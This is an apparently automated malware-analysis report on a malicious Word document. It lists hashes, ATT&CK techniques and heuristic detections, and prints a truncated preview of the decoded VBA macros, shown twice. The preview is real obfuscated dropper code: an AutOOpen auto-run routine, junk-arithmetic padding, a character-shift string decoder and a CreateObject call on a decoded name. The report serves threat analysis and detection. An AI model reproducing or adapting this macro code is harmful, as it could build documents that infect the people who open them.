Office (OLE) malware analysis — malicious · 5e17b535ca08c022

MALICIOUS

Office (OLE)

90.5 KB Created: 2018-05-15 09:08:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: c47fac7f2e95e1bd7f47fb8fcf0b6f50 SHA-1: a94c6e917be099eb43abe3b05a2daa0705cf6025 SHA-256: 5e17b535ca08c022ce2c789889aced1a302906ff5f7a867f590d1f9102399f07

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing VBA macros. The 'AutOOpen' macro is designed to execute automatically upon opening. The document body explicitly prompts the user to 'Enable Editing' and 'Enable Content', a common lure for macro-based malware. The presence of 'CreateObject' and 'CallByName' calls within the VBA code suggests the macro is attempting to instantiate and interact with system objects, likely to download and execute a secondary payload.

Heuristics 9

ClamAV: Doc.Dropper.Agent-6544915-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6544915-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsof In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/contentTypeIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributesIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/propertiesIn document text (OLE body)
- http://www.w3.org/2001/XMLSchemaIn document text (OLE body)
- http://schemas.microsoft.com/sharepoint/v3In document text (OLE body)
- http://schemas.microsoft.com/sharepoint/v4In document text (OLE body)
- http://schemas.microsoft.com/office/2006/documentManagement/typesIn document text (OLE body)
- http://schemas.microsoft.com/office/infopath/2007/PartnerControlsIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/docuIn document text (OLE body)
- http://schemas.openxmlformats.org/package/2006/metadata/core-propertiesIn document text (OLE body)
- http://www.w3.org/2001/XMLSchema-instanceIn document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://purl.org/dc/terms/In document text (OLE body)
- http://schemas.microsoft.com/internal/obdIn document text (OLE body)
- http://dublincore.org/schemas/xmls/qdc/2003/04/02/dc.xsdIn document text (OLE body)
- http://dublincore.org/schemas/xmls/qdc/2003/04/02/dcterms.xsdIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/longPropertiesIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8272 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8272 bytes
SHA-256: `cb401f13e6806952737b5e7e38d6645c189d8982854c90b75e2d4cbb40aabb70`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutOOpen() firephar oknepriK = 9 - 57 oknepriK = oknepriK + 3 - oknepriK - oknepri oknepriK = 1 + oknepriK + 3 oknepriK = 55 - 3 oknepriK = 11 * 15 - 19 * 25 * oknepri End Sub Attribute VB_Name = "adameaster" Attribute VB_Base = "0{2C92BB5A-A8A1-407F-A8FE-2EE3E5303E04}{0316BAD8-4FE1-4CB8-99EB-C800EBE2699A}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub kill_Diabl_Change() amigamarc = xaochekbn(astigfeu) splenski = xaochekbn(astigfeu) dream301 = xaochekbn(andrewkids) ffffffdisk = xaochekbn(andrewkids) AYLEGEREZ = 37 * 42 AYLEGEREZ = 82 - 5 AYLEGEREZ = 91 - 10 + 7 AYLEGEREZ = 131 - 107 + 35 - AYLEGERE AYLEGEREZ = 7 - 34 - 24 + 4 mykeybuzz amigamarc, splenski, dream301, ffffffdisk End Sub Attribute VB_Name = "allenflash" Function deepdota() deepdota = cogkulbr.haiteev5 End Function Function gx999631(rose1288) yrasrevda = "" lawsellt = Len(rose1288) oknepriK = 9 - 57 oknepriK = 1 + oknepriK + 3 oknepriK = 55 - 3 oknepriK = 11 * 15 - 11 * 25 * oknepri For avalonmark = 1 To lawsellt yrasrevda = yrasrevda + avokniriM(sherry192(rose1288, avalonmark), 4) oknepriK = 9 - 57 oknepriK = oknepriK + 3 - oknepriK - oknepri oknepriK = 55 - 3 oknepriK = 11 * 15 - 11 * 25 * oknepri Next avalonmark oknepriK = 9 - 57 oknepriK = oknepriK + 3 - oknepriK - oknepri oknepriK = 1 + oknepriK + 3 oknepriK = 55 - 3 gx999631 = yrasrevda End Function Attribute VB_Name = "bagshect" Function caslingi() caslingi = adameaster.thrinbit End Function Function sherry192(salmon1959, oras1974) sherry192 = Mid(salmon1959, oras1974, 1) End Function Function mykeybuzz(felixgizmo, sitesmile, tsiDsaZ3, aykobilovbuff) oknepriK = 9 - 57 oknepriK = oknepriK + 3 - oknepriK - oknepri oknepriK = 1 + oknepriK + 3 oknepriK = 55 - 3 oknepriK = 11 * 15 - 11 * 25 * oknepri cogkulbr.jason163 = marcynkb(felixgizmo, sitesmile) + subflira(felixgizmo, tsiDsaZ3) + webwin98(aykobilovbuff) End Function Function IIKSVOPAHS() IIKSVOPAHS = "Qmmgcc[Qygoui;ugo]/lEmaE[xR]QgluhR/uyE.]/" End Function Attribute VB_Name = "cogkulbr" Attribute VB_Base = "0{5607C534-CEF6-4D6B-B00C-9DC182D16A60}{277B3D3D-63DF-4BD9-89C4-0F01CD92206C}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CheckBox1_Click() MsgBox "Ok" End Sub Private Sub CommandButton1_Click() MsgBox "Ok" End Sub Private Sub jason163_Change() Set thebidea = CreateObject(agrardri) voluntarism = 53 * 91 voluntarism = voluntarism * 1 - 76 + 14 * 3 voluntarism = 12 + 1 voluntarism = voluntarism - 13 * 8 - voluntaris gjlcdtxy thebidea End Sub Private Sub Label1_Click() MsgBox "Ok" End Sub Private Sub ToggleButton1_Click() MsgBox "Ok" End Sub Attribute VB_Name = "dreadnec" Attribute VB_Base = "0{877B09D5-74BA-4EC0-846F-726AE1A9B3B2}{8994CB60-5E16-4EC6-80A6-42311E52B588}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Egjvbyfk" Function webwin98(bellejosh) oknepriK = 9 - 57 oknepriK = oknepriK + 3 - oknepriK - oknepri oknepriK = 1 + oknepriK + 3 oknepriK = 55 - 3 oknepriK = 11 * 15 - 11 * 25 * oknepri webwin98 = gx999631(IIKSVOPAHS + dreadnec.candydisk) + bellejosh + _ gx999631(dreadnec.rainbow008) + bellejosh + gx999631(adameaster.versropg) End Function Function astigfeu() astigfeu = dreadnec.Bulle ... (truncated)

SHA-256: cb401f13e6806952737b5e7e38d6645c189d8982854c90b75e2d4cbb40aabb70

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
firephar
oknepriK = 9 - 57
oknepriK = oknepriK + 3 - oknepriK - oknepri
oknepriK = 1 + oknepriK + 3
oknepriK = 55 - 3
oknepriK = 11 * 15 - 19 * 25 * oknepri
End Sub

Attribute VB_Name = "adameaster"
Attribute VB_Base = "0{2C92BB5A-A8A1-407F-A8FE-2EE3E5303E04}{0316BAD8-4FE1-4CB8-99EB-C800EBE2699A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub kill_Diabl_Change()
amigamarc = xaochekbn(astigfeu)
splenski = xaochekbn(astigfeu)
dream301 = xaochekbn(andrewkids)
ffffffdisk = xaochekbn(andrewkids)
AYLEGEREZ = 37 * 42
AYLEGEREZ = 82 - 5
AYLEGEREZ = 91 - 10 + 7
AYLEGEREZ = 131 - 107 + 35 - AYLEGERE
AYLEGEREZ = 7 - 34 - 24 + 4
mykeybuzz amigamarc, splenski, dream301, ffffffdisk
End Sub

Attribute VB_Name = "allenflash"
Function deepdota()
deepdota = cogkulbr.haiteev5
End Function

Function gx999631(rose1288)
yrasrevda = ""
lawsellt = Len(rose1288)
oknepriK = 9 - 57
oknepriK = 1 + oknepriK + 3
oknepriK = 55 - 3
oknepriK = 11 * 15 - 11 * 25 * oknepri
For avalonmark = 1 To lawsellt
yrasrevda = yrasrevda + avokniriM(sherry192(rose1288, avalonmark), 4)
oknepriK = 9 - 57
oknepriK = oknepriK + 3 - oknepriK - oknepri
oknepriK = 55 - 3
oknepriK = 11 * 15 - 11 * 25 * oknepri
Next avalonmark
oknepriK = 9 - 57
oknepriK = oknepriK + 3 - oknepriK - oknepri
oknepriK = 1 + oknepriK + 3
oknepriK = 55 - 3
gx999631 = yrasrevda
End Function





Attribute VB_Name = "bagshect"
Function caslingi()
caslingi = adameaster.thrinbit
End Function

Function sherry192(salmon1959, oras1974)
sherry192 = Mid(salmon1959, oras1974, 1)
End Function

Function mykeybuzz(felixgizmo, sitesmile, tsiDsaZ3, aykobilovbuff)
oknepriK = 9 - 57
oknepriK = oknepriK + 3 - oknepriK - oknepri
oknepriK = 1 + oknepriK + 3
oknepriK = 55 - 3
oknepriK = 11 * 15 - 11 * 25 * oknepri
cogkulbr.jason163 = marcynkb(felixgizmo, sitesmile) + subflira(felixgizmo, tsiDsaZ3) + webwin98(aykobilovbuff)
End Function

Function IIKSVOPAHS()
IIKSVOPAHS = "Qmmgcc[Qygoui;ugo]/lEmaE[xR]QgluhR/uyE.]/"
End Function




Attribute VB_Name = "cogkulbr"
Attribute VB_Base = "0{5607C534-CEF6-4D6B-B00C-9DC182D16A60}{277B3D3D-63DF-4BD9-89C4-0F01CD92206C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub CheckBox1_Click()
MsgBox "Ok"
End Sub

Private Sub CommandButton1_Click()
MsgBox "Ok"
End Sub

Private Sub jason163_Change()
Set thebidea = CreateObject(agrardri)
voluntarism = 53 * 91
voluntarism = voluntarism * 1 - 76 + 14 * 3
voluntarism = 12 + 1
voluntarism = voluntarism - 13 * 8 - voluntaris
gjlcdtxy thebidea
End Sub

Private Sub Label1_Click()
MsgBox "Ok"
End Sub

Private Sub ToggleButton1_Click()
MsgBox "Ok"
End Sub

Attribute VB_Name = "dreadnec"
Attribute VB_Base = "0{877B09D5-74BA-4EC0-846F-726AE1A9B3B2}{8994CB60-5E16-4EC6-80A6-42311E52B588}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False



Attribute VB_Name = "Egjvbyfk"
Function webwin98(bellejosh)
oknepriK = 9 - 57
oknepriK = oknepriK + 3 - oknepriK - oknepri
oknepriK = 1 + oknepriK + 3
oknepriK = 55 - 3
oknepriK = 11 * 15 - 11 * 25 * oknepri
webwin98 = gx999631(IIKSVOPAHS + dreadnec.candydisk) + bellejosh + _
gx999631(dreadnec.rainbow008) + bellejosh + gx999631(adameaster.versropg)
End Function

Function astigfeu()
astigfeu = dreadnec.Bulle
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.